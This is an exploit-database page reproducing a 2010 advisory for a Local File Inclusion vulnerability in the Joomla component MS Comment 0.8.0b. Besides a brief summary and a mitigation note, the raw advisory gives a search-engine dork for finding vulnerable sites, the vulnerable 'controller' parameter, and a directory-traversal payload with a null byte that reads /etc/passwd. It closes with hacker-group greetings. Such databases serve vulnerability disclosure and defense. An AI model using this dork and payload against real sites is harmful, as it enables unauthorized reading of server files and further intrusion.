header-logo
Suggest Exploit
vendor:
MS Comment
by:
Xr0b0t
7,5
CVSS
HIGH
LFI
22
CWE
Product Name: MS Comment
Affected Version From: 0.8.0b
Affected Version To: 0.8.0b
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component MS Comment LFI Vulnerability

A Local File Inclusion (LFI) vulnerability exists in Joomla Component MS Comment version 0.8.0b and possibly lower versions. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This can allow the attacker to read sensitive files on the server, such as the /etc/passwd file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

[!]===========================================================================[!]

[~] Joomla Component MS Comment LFI Vulnerability 
[~] Author	: Xr0b0t (nyco.danis@gmail.com)
[~] Homepage	: http://www.indonesiancoder.com | http://Xr0b0t.name | http://Malangcyber.com
[~] Date	: 16 Mei, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_mscomment" ;)
[+] Version : 0.8.0b maybe lower also affected 

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_mscomment&controller=[INDONESIANCODER]

[ XpL ]

../../../../../../../../../../../../../../../etc/passwd%00


etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] kaMtiEz dulurku seng paling ganteng, endi kok ra rene
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck,Geni212
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha


[ NOTE ]

[+] OJOK JOTOS2an YO ..
[+] Minggir semua Arumbia Team Mau LEwat ;)
[+] MBEM : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community

Navigation

Suggest Exploit

Services By CQR